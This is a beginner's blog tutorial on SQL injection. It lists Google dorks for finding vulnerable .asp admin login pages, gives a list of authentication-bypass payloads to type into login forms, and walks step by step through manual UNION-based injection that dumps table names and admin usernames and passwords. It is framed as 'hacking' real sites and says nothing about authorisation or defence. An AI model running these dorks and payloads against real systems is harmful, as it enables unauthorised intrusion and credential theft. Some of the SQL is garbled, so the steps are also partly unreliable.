Sql Injection

Hello guys this is my first blog and I am very much excited and even not much confident about what to share with you people .
But since I had some decent knowledge in the the field of Hacking So lets start with some of the very basic Website
Hacking Tricks. ;)
Let see one of the very popular topic Sql Injection.

So,what is an sql injection?
A injecting sql queries into another database or using queries to get auth bypass as an admin is called
sql injection.
 i will show it in 2 parts

part 1 : Basic sql injection

Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now what to do once we get to our site.
the site should look something like this :

welcome to xxxxxxxxxx administrator panel
username :
password :

so what we do here is in the username we always type "sql injection"
and for our password also we type our sql injection

here is a list of sql injections

1'or'1'='1
'x or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'


there are many more but these are the best ones that i know of
and what this sql injection is doing : confusing the fuck out of the database till it gives you auth bypass.

So your input should look like this

username:1'or'1'='1
password:1'or'1'='1

So click submit and you'r in

NOTE not all sites are vulnerable.


part 2: injecting sql queries to extract the admin username and password
                also called manual sql injection


ok so lets say we have a site :

 http://www.site.com/departmentindex.php?id=-48'

Functions used:
database() || for finding the database name
version()  || for finding the version of the db
user()     || for finding the root user of the db
group_concat() || for make the collection of the different things

Step:1 find the parameter value || somthing=somthing
       EX:
 http://www.site.com/departmentindex.php?id=-48'          select * from products where id=48;
         http://www.site.com/departmentindex.php?id=-48' is just an  example

Step:2 apply single quote '
       EX:
 http://www.site.com/departmentindex.php?id=-48'

Step:3 find number of columns
      id=15 order by 1-- || for union base sqli
      id=15'order by 1-- - || for string base sqli
   
 http://www.site.com/departmentindex.php?id=-48'order by 16-- -

Step:4 now find vul column
         
 
 http://www.site.com/departmentindex.php?id=-48'union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- -

Step:5 Now find the tables

 
 http://www.site.com/departmentindex.php?id=-48'union select 1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15 from information_schema.table_constraints-- -

Step:6 Now finding the columns


 http://www.site.com/departmentindex.php?id=-48'union select 1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15 from information_schema.columns where table_name='useraccounts'-- -

Step:7fetching Data

 http://www.site.com/departmentindex.php?id=-48'union select 1,2,3,4,5,6,group_concat(uname,upassword),8,9,10,11,12,13,14,15 from table_name='useraccounts'-- -

and you will get an admin account login password.

you can also do this by automated tool may be i can show it to you in my future post

happy hacking ;p

NOTE: you can even offer me work for training you ethical hacking on  shubhamchoudharyhacker.com